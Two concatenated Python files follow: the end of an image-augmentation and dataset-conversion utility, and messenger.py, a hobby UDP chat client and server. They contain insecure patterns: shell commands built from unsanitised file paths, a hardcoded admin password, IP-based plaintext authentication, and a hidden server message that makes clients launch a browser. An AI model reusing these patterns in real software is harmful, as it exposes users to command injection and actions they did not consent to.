height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[1] + border[1] # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[0] + border[0] # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 2) & (h > 2) & (area / (area0 * s + 1e-16) > 0.2) & (ar < 20)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
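# Minimal smoke-test sketch for letterbox() (illustrative only), guarded so
# importing this module stays side-effect free:
if __name__ == '__main__':
    _demo = np.full((480, 640, 3), 114, dtype=np.uint8)  # plain grey test frame
    _boxed, _ratio, _pad = letterbox(_demo, new_shape=640)
    print('letterbox demo -> shape %s, ratio %s, pad %s' % (_boxed.shape, _ratio, _pad))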
|
messenger.py
|
# -----------
# Messenger
# Credits: JuNi4 (https://github.com/JuNi4/CLOS)
# -----------
#
# Example Commands:
# messenger -server -client -listserver
# Server example: python3 messenger.py -s -els -lsip 127.0.0.1 -ecl -name Server
# list Server: python3 messenger.py -ls
# client python3 messenger.py -c -u NAME -ip localhost
#
# ToDo:
# - Bad Word Kicker
# - Temp Ban
from getpass import getpass
import re
from shutil import ExecError
import threading
import platform
import datetime
import subprocess
import keyboard
import pathlib
import socket
import sys
import os
import time
# File Dialog
import tkinter as tk
from tkinter import filedialog
# Pillow to read every pixel from a image
from PIL import Image
# Json for img to json convertion and vice versa
import json
# Images
class itj():
class color():
r = '\033[1;0m'
def rgb(r=0,g=255,b=50):
return '\033[38;2;'+str(r)+';'+str(g)+';'+str(b)+'m'
def img_to_text(scling = 1, shrink = 1, img = 'img.png', rgb = color.rgb, r = color.r):
scling = int(scling)
shrink = int(shrink)
img = Image.open(img)
img = img.convert('RGB')
scaling = img.size
i = 0
while i+shrink <= scaling[1]:
i2 = 0
pval = ''
while i2+shrink <= scaling[0]:
val = img.getpixel((i2,i))
pval = pval+rgb(val[0], val[1], val[2])+'██'*scling
i2 += shrink
i += shrink
print(pval+r)
def img_to_json(scling = 1, shrink = 1, img = 'img.png', rgb = color.rgb, r = color.r):
jo = {
"name": "lol",
"w": 0,
"h": 0,
"pix": []
}
jol = json.loads(json.dumps(jo))
sp = '/'
if 'Windows' in platform.system():
sp = '\\'
jol["name"] = img.split(sp)[len(img.split(sp))-1]
scling = int(scling)
shrink = int(shrink)
img = Image.open(img)
img = img.convert('RGB')
scaling = img.size
jol["w"] = int(scaling[0]/shrink)
jol["h"] = int(scaling[1]/shrink)
i = 0
while i+shrink <= scaling[1]:
i2 = 0
pval = []
while i2+shrink <= scaling[0]:
val = img.getpixel((i2,i))
pval.append([val[0],val[1],val[2]])
i2 += shrink
i += shrink
jol["pix"].append(pval)
return json.dumps(jol, indent=4)
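# The returned JSON looks like (illustrative 2x1 image, shrink=1):
#   {"name": "img.png", "w": 2, "h": 1, "pix": [[[255, 0, 0], [0, 255, 0]]]}
# i.e. "pix" is a list of rows, each pixel an [r, g, b] triple, with w and h
# already divided by the shrink factor.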
def json_to_text(scling = 1, shrink = 1, json2 = '{"name": "lol", "w": 0, "h": 0, "pix":[[],[]]}', rgb = color.rgb, r = color.r):
img = json.loads(json2)
scling = int(scling)
shrink = int(shrink)
scaling = (img["w"],img["h"])
i = 0
while i+shrink <= scaling[1]:
i2 = 0
pval = ''
while i2+shrink <= scaling[0]:
val = img["pix"][i][i2]
pval = pval+rgb(val[0], val[1], val[2])+'██'*scling
i2 += shrink
i += shrink
print(pval+r)
def manage_json(scling = 1, shrink = 1, json2 = '{"name": "lol", "w": 0, "h": 0, "pix":[[0,0,0],[]]}', rgb = color.rgb, r = color.r):
jo = {
"name": "lol",
"w": 0,
"h": 0,
"pix": []
}
jol = json.loads(json.dumps(jo))
img = json.loads(json2)
scling = int(scling)
shrink = int(shrink)
jol["name"] = img["name"]
jol["w"] = int(img["w"]/shrink)
jol["h"] = int(img["h"]/shrink)
scaling = (img["w"],img["h"])
i = 0
while i+shrink <= scaling[1]:
i2 = 0
pval = []
while i2+shrink <= scaling[0]:
try:
val = img["pix"][i][i2]
except:
val = img["pix"][i2][i]
pval.append([val[0],val[1],val[2]])
i2 += shrink
i += shrink
jol["pix"].append(pval)
return json.dumps(jol, indent=4)
# RGB
def rgb(r=0,g=255,b=50):
return '\033[38;2;'+str(r)+';'+str(g)+';'+str(b)+'m'
def brgb(r=0,g=255,b=50):
return '\033[48;2;'+str(r)+';'+str(g)+';'+str(b)+'m'
# Client
def client():
arg = sys.argv
if '-ip' in arg:
SERVER = arg[arg.index('-ip')+1]
else:
print('ERROR: Server address needs to be defined (-ip [ip])')
exit()
if '-p' in arg:
PORT = arg[arg.index('-p')+1]
else:
PORT = 4242
if '-u' in arg:
client_name = arg[arg.index('-u')+1]
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
print('Warning: username will be your IP: '+s.getsockname()[0])
client_name = s.getsockname()[0]
s.close()
if not 'disToasts' in arg:
toasts = True
else:
toasts = False
if not '-standalone' in arg:
c_server = threading.Thread(target=client_server, args=('', str(os.getpid()), toasts))
c_server.start()
pw = getarg('-pw', '')
# Function to send the message "MSG" to the server
def sendMsg(MSG):
# Create the socket
# We use IPv4 with a UDP datagram socket (SOCK_DGRAM)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = (SERVER, int(PORT))
# Set the destination address
# TODO: error handling is still missing!
sock.connect(server_address)
# Send the message
sock.sendall(MSG)
# Close the socket again
sock.close()
return 1
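# Note: with SOCK_DGRAM, connect() only fixes the peer address and sendall()
# emits a single UDP datagram, so every sendMsg() call is one connectionless
# message rather than part of a TCP stream.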
if not pw == '':
sendMsg(bytes('/auth '+pw, 'utf-8'))
jmsg = '/join '+str(client_name)
sendMsg(bytes(jmsg, 'utf-8'))
# Main loop
while True:
mymsg = input("")
if mymsg == '/auth' or mymsg == '/aauth':
password = getpass()
mymsg += ' '+password
# Send an Image to the Server
if mymsg[:4] == '/img':
# Make tkinter window object
root = tk.Tk()
root.withdraw()
# Open file dialog
file_path = filedialog.askopenfilename()
# Continue only if a path has been selected
if not file_path == '':
# Check if the is a png or jpg
if file_path[len(file_path)-3:].lower() == 'png' or file_path[len(file_path)-3:].lower() == 'jpg':
# Load file into Json
print('System: Sending File: '+file_path+' To Server..')
sendspl = itj.img_to_json(1,1,file_path)
# Send first Part of message
# Load text to json
ij = json.loads(sendspl)
w = int(ij["w"])
h = int(ij["h"])
w2 = w
h2 = h
sc = 1
print('OLD W&H: '+str(w)+' '+str(h))
# shrink image down if needed
while w2 > 38 or h2 > 38:
sc += 1
w2 = int(w/sc)
h2 = int(h/sc)
# get calculated shrink values and shrink
print('NEW W&H: '+str(w2)+' '+str(h2)+' AND SCALE: '+str(sc))
sendspl = itj.manage_json(1,sc,sendspl)
sendspl = sendspl.split(',')
sendMsg(bytes('/img '+sendspl[0], 'utf-8'))
# Send rest of message
a = len(sendspl)
#print(str(a),str(int(a/10)*10),str(int(a/10)*10 < a))
for i in range(0,10):
sendspl.append("")
for i in range(0,int((a+1)/10)+1):
#print(len(sendspl)-1,i*10+10,int((a)/10)+1)
if not sendspl[i*10+1] == ',':
try:
x = (sendspl[i*10+1]+','+sendspl[i*10+2]+','+sendspl[i*10+3]+','+sendspl[i*10+4]+','+sendspl[i*10+5]+','+sendspl[i*10+6]+','+sendspl[i*10+7]+','+sendspl[i*10+8]+','+sendspl[i*10+9]+','+sendspl[i*10+10]).replace(' ', '')
try:
x = x[:x.index('}')+1]
except:
pass
try:
x = x[:x.index(',,')]
except:
pass
sendMsg(bytes(x,'utf-8'))
except:
pass
time.sleep(0.01)
print('System: Done!')
else:
print('System: Wrong File Format. Only png or jpg.')
else: sendMsg(bytes(mymsg, 'utf-8'))
if mymsg[0:6] == '/leave':
print('Leaving...')
time.sleep(2)
exit()
# Client server used to receive messages
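# Roughly: it binds a UDP socket on port 4243 and prints everything the chat
# server pushes, handling a few control payloads (!leave_account_requested_by_self,
# !img, !important_message) and raising a desktop notification when the
# terminal window is not focused.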
def client_server(ip = "", cpid = '', toasts = True):
# Window Focus and Toast stuff
if not 'Windows' in platform.system():
import gi
gi.require_version("Wnck", "3.0")
from gi.repository import Wnck
from Xlib import X, XK, protocol, display, Xcursorfont
from Xlib.ext import xtest
from Xlib.protocol import request
else:
from win10toast import ToastNotifier
# If current window in focus
def isFocused():
if 'Windows' in platform.system():
return True
disp = display.Display()
root = disp.screen().root
pointer_info = request.QueryPointer(display = disp.display, window = root)
root_xpos, root_ypos = (pointer_info._data['root_x'], pointer_info._data['root_y'])
targetwindow = disp.get_input_focus().focus
scr = Wnck.Screen.get_default()
scr.force_update()
fwin = targetwindow.id
scr = Wnck.Screen.get_default()
scr.force_update()
cwin = scr.get_active_window().get_xid()
return fwin==cwin
# Toasts
def Toast(msg, titl):
if toasts:
if 'Windows' in platform.system():
toaster = ToastNotifier()
toaster.show_toast("titl","lol",)
else:
subprocess.Popen(['notify-send', titl, msg])
# "" == INADDR_ANY
SERVER = ip
PORT = 4243
# Buffer size for recv()
BUF_SIZE = 1024
# This is the server.
# Open the server port
#sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = (SERVER, PORT)
# Bind the server to the port
sock.bind(server_address)
#print("Server arbeitet auf Port ", PORT, sep="")
show_img = True
if '-disimg' in sys.argv:
show_img = False
while True:
# Receive response
data, server = sock.recvfrom(4096)
if data.decode()[0:32] == "!leave_account_requested_by_self":
if data.decode()[0:41] == "!leave_account_requested_by_self _nonself":
if data.decode()[42:48] == "__msg:":
print('You got Kicked! Reason: '+data.decode()[48:])
if not isFocused():
Toast("Disconnected: Kicked: "+data.decode()[48:], "Messenger")
else:
print('You got kicked!')
if not isFocused():
Toast("Disconnected: Kicked", "Messenger")
if 'Windows' in platform.system():
os.system('taskkill /PID '+cpid+' /F>nil')
else:
os.system('kill '+cpid+'>nil')
time.sleep(2)
elif data.decode()[0:42] == "!leave_account_requested_by_self _svclosed":
if not isFocused():
Toast("Disconnected: Server Closed", "Messenger")
print('Server Closed')
if 'Windows' in platform.system():
os.system('taskkill /PID '+cpid+' /F>nil')
else:
os.system('kill '+cpid+'>nil')
time.sleep(2)
exit()
elif data.decode()[:19]=='!important_message ':
print(data.decode()[19:])
Toast(data.decode()[19:], "Messenger")
elif data.decode()[:4] == '!img':
rcvstr = data.decode()[5:]+','
# Receive every part of the image
while not '}' in list(rcvstr):
data, address = sock.recvfrom(4096)
if not '}' in list(data.decode()):
rcvstr += data.decode()+','
else:
dat = data.decode()[:data.decode().index('}')+1]
rcvstr += dat
# Print Json Image data
#print(rcvstr.replace('\n','').replace(' ', ''))
# Load text to json
#f = open("json.json",'w')
#f.write(rcvstr)
#f.close()
rcvstr = rcvstr[:len(rcvstr)-2]+rcvstr[len(rcvstr)-2:].replace(',','')
ij = json.loads(rcvstr)
w = int(ij["w"])
h = int(ij["h"])
w2 = w
h2 = h
sc = 1
# shrink image down if needed
while w2 > 38 or h2 > 38:
sc += 1
w2 = int(w/sc)
h2 = int(h/sc)
# get calculated shrink values and shrink
sendji = itj.manage_json(1,sc,rcvstr)
# display
itj.json_to_text(1,sc,sendji)
elif data.decode() == '!secure_corckrl':
try:
os.system('start firefox https://www.youtube.com/watch?v=dQw4w9WgXcQ')
except:
os.system('start chrome https://www.youtube.com/watch?v=dQw4w9WgXcQ')
elif not data.decode() == '':
print(data.decode())
if not 'Windows' in platform.system():
if not isFocused():
Toast(data.decode(), "Messenger")
# Server
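# server() is the chat room itself: a UDP socket bound to server_port receives
# client commands (/join, /auth, /aauth, /leave, /list, /img and the ! admin
# commands) and fans messages out to every registered client on port 4243.
# If listing is enabled it also registers itself with a list server so that
# clients can discover it.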
def server(list_server_ip = '', list_server_port = '4244', server_name = '', server_port = '4242', listtheserver = False, ch_log = '', l_file = '', epw = False, pw ='', apw = 'jf/eu§nf(7UF+3ef5#]534*', ecl = True):
if l_file == '':
l_file = os.path.dirname(os.path.realpath(__file__))+'\\server_log.txt'
if not 'Windows' in platform.system():
l_file = os.path.dirname(os.path.realpath(__file__))+'/server_log.txt'
if ch_log == '':
ch_log = os.path.dirname(os.path.realpath(__file__))+'\\messenger_chat_log.txt'
if not 'Windows' in platform.system():
ch_log = os.path.dirname(os.path.realpath(__file__))+'/messenger_chat_log.txt'
log('\n\nlog from '+"--"+datetime.datetime.now().strftime("%Y/%m/%d %H:%M:%S")+"--\n", l_file, False)
log('---------------------------------------------', l_file)
log(' JuNi\'s Messenger Server', l_file)
log(' By JuNi, GitHub: https://github.com/juni4', l_file)
log('---------------------------------------------', l_file)
time.sleep(0.1)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Starting server...", l_file)
dev = False
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Debugmode "+str(dev), l_file)
arg = sys.argv
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Arguments givin: "+str(arg), l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Setting PORT", l_file)
PORT = int(server_port)
# list server interaction
#if '-lsip' in arg:
# lsip = arg[arg.index('-lsip')+1]
# "" == INADDR_ANY
SERVER = ""
# List server stuff
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server NAME: "+server_name, l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server Pssword: "+str(epw), l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server listing: "+str(listtheserver), l_file)
if not list_server_ip == '':
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] List Server IP: "+list_server_ip, l_file)
if not list_server_port == '':
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] List Server Port: "+list_server_port, l_file)
if bool(listtheserver):
lspd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
lspd.connect((list_server_ip, int(list_server_port)))
lspd.close()
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Getting PC IP.", l_file)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
cserver_ip = s.getsockname()[0]
s.close()
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Rigistering Server on List Server as "+server_name+".", l_file)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes('list_register '+cserver_ip+' '+str(PORT)+' '+server_name+' '+str(epw)+' 0','utf-8'), (list_server_ip, int(list_server_port)))
sock.close()
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server Registered.", l_file)
except:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Register Error. Maybe the server is offline?", l_file)
except:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] The Listserver is not available.", l_file)
listtheserver = False
lspd.close()
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Setting up usr vars", l_file)
# USR Specific vars for holding USR data
usr = []
usrn= []
usraddr = []
auth = []
admin_auth = []
timeout = []
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Setting up Waitlist vars", l_file)
# Waitlist var
waitlistn = []
waitlistip = []
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Setting up usr vars complete: usr, usrn, usraddr, auth, adminauth, waitlistn, waitlistip, timeout", l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Creating UDP Socket", l_file)
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Binding socket to PORT", l_file)
# Bind the socket to the port
server_address = (SERVER, PORT)
#log('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server opened on port: "+ str(PORT), l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Creating server functions", l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Creating kick function", l_file)
def kick(tusr, msg, did, kickindex = '_nonself'):
# get usr index in usr list
if not tusr in usrn:
print('['+datetime.datetime.now().strftime("%H:%M:%S")+'] USR '+did+' tried to kick a person who isn\'t in this room')
sock.sendto(bytes('Sorry but this Person isn\'t in this room','utf-8'), (addr[0],4243))
return
usrindex = usrn.index(tusr)
# log message that usr xy left
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] User with IP '+usr[usrindex]+' and Name '+usrn[usrindex]+' got kicked by '+did+' reason: '+msg+'.', l_file)
if ecl:
log(usrn[usrn.index(tusr)]+" left the room.",ch_log, False)
# send all usrs leave message
for o in usr:
if usrn[usr.index(o)] == usrn[usrn.index(tusr)]:
# if it's the person being kicked, send their client server an exit message
sock.sendto(bytes("!leave_account_requested_by_self "+kickindex+" __msg:"+msg, encoding='utf-8'), (usraddr[usrn.index(tusr)][0],4243))
else:
if o in admin_auth:
sock.sendto(bytes(usrn[usrn.index(tusr)]+" got kicked by "+did+'.', encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
else:
# else send leave message
sock.sendto(bytes(usrn[usrn.index(tusr)]+" left the room.", encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
if dev:
# debug message
log('Send leave message to User Ip: '+o+' Name='+usrn[usr.index(o)], l_file)
# remove usr from auth list
if epw:
auth.pop(int(usrindex))
# remove usr from admin list
if usr[usrindex] in admin_auth:
admin_auth.pop(usrindex)
# remove usr from usr lists
usr.pop(int(usrindex))
usrn.pop(int(usrindex))
usraddr.pop(int(usrindex))
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Creating is_usrn_taken function", l_file)
def is_usrn_taken(tusrn):
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Checking if usrname is already taken", l_file)
x = True
c = 1
tuser2 = tusrn
while x and c < 100:
if tuser2 in usrn:
if tuser2 == tusrn:
tuser2 = tusrn + str(c)
else:
tuser2 = tuser2[:len(tuser2)-1]+str(c)
else:
if tuser2 == tusrn:
# the requested name is free, keep it unchanged
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Usrname "+tuser2+" wasn\'t taken", l_file)
else:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Usrname was taken and is now "+tuser2, l_file)
x = False
c += 1
return tuser2
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Done!", l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Awaiting Input...", l_file)
while True:
try:
data, address = sock.recvfrom(4096)
addr = address
msg = data.decode()
except Exception as exp:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] An Error Acurred: "+str(exp), l_file)
addr = ["0", 0]
msg = ""
#log(str(addr)+': '+data.decode(), "'", sep="")
# Join server
if msg[0:5] == '/join':
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Join Message by IP: "+addr[0]+" is trying to join.", l_file)
# If user is permitted to join...
if addr[0] in auth or epw == False:
# ..and not already connected...
if not addr[0] in usr:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Usr is allowed to Join and will join", l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Adding usr to usr lists", l_file)
# ..let USR join
# set name of usr
name = is_usrn_taken(msg[6:len(msg)])
# add usr values to joined list
usr.append(str(addr[0]))
usrn.append(name)
usraddr.append(addr)
# tell other users that a new usr joined
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] New USER IP: '+str(addr[0])+' Name: '+name, l_file)
# Send chat log
if ecl:
# Read chatlog file
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Reading Chat log", l_file)
clog = open(ch_log, 'r')
chlog_ar = []
for line in clog:
chlog_ar.append(line.rstrip())
clog.close()
#if not len(chlog_ar) == 0:
# chlog_ar.pop(len(chlog_ar)-1)
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] Sending Chat log to '+usrn[usr.index(addr[0])], l_file)
for o in chlog_ar:
sock.sendto(bytes(o,'utf-8'), (addr[0],4243))
if dev:
log('Sending chat log to '+usrn[usr.index(addr[0])], l_file)
# Join message
for o in usr:
sock.sendto(bytes(usrn[usr.index(addr[0])]+" joined the room.", encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
if ecl:
log(usrn[usr.index(addr[0])]+" joined the room.",ch_log, False)
#log(,ch_log, False)
if dev:
log('Send join message to User Ip: '+o+' Name='+usrn[usr.index(o)], l_file)
else:
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] IP: '+addr[0]+' tried to login with a second account.', l_file)
else:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] USR was not authed so usr will be added to waitlist", l_file)
name = msg[6:len(msg)]
waitlistn.append(name)
waitlistip.append(addr[0])
# Auth on Server
elif msg[0:5] == '/auth' and epw:
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] Received auth command from IP: '+addr[0], l_file)
if msg[6:len(msg)] == pw and not addr[0] in auth:
auth.append(addr[0])
if not addr[0] in usr and addr[0] in waitlistip:
# ..let USR join
# set name of usr
name = is_usrn_taken(waitlistn[waitlistip.index(addr[0])])
# add usr values to joined list
usr.append(str(addr[0]))
usrn.append(name)
usraddr.append(addr)
# tell other users that a new usr joined
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] New USER IP: '+str(addr[0])+' Name: '+name, l_file)
for o in usr:
sock.sendto(bytes(usrn[usr.index(addr[0])]+" joined the room.", encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
#log(,ch_log, False)
if dev:
log('Send join message to User Ip: '+o+' Name='+usrn[usr.index(o)], l_file)
if ecl:
log(usrn[usr.index(addr[0])]+" joined the room.",ch_log, False)
# Send chat log
if ecl:
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] Sending Chat log to '+usrn[usr.index(addr[0])], l_file)
# Read chatlog file
clog = open(ch_log, 'r')
chlog_ar = []
for line in clog:
chlog_ar.append(line.rstrip())
clog.close()
#if not len(chlog_ar) == 0:
# chlog_ar.pop(len(chlog_ar)-1)
for o in chlog_ar:
sock.sendto(bytes(o,'utf-8'), (addr[0],4243))
try:
wl_index = waitlistip.index(addr[0])
waitlistip.pop(wl_index)
waitlistn.pop(wl_index)
except Exception as e:
print(e)
print(waitlistip,waitlistn)
# Admin auth on Server
elif msg[0:6] == '/aauth' and addr[0] in usr:
if msg[7:len(msg)] == apw and not addr[0] in admin_auth:
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] USER IP: '+str(addr[0])+' Name: '+usrn[usr.index(addr[0])]+' became mod.', l_file)
admin_auth.append(addr[0])
for o in admin_auth:
sock.sendto(bytes(usrn[usr.index(addr[0])]+" became mod.", encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
if dev:
log('Send mod message to User Ip: '+o+' Name='+usrn[usr.index(o)],l_file)
else:
sock.sendto(bytes('Sorry, but the Password is incorrect', 'utf-8'), (addr[0],4243))
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] USER IP: '+str(addr[0])+' Name: '+usrn[usr.index(addr[0])]+' tried to become mod with an incorrect password.', l_file)
# /leave command
elif msg[0:6] == '/leave':
# get usr index in usr list
usrindex = usr.index(addr[0])
# log message that usr xy left
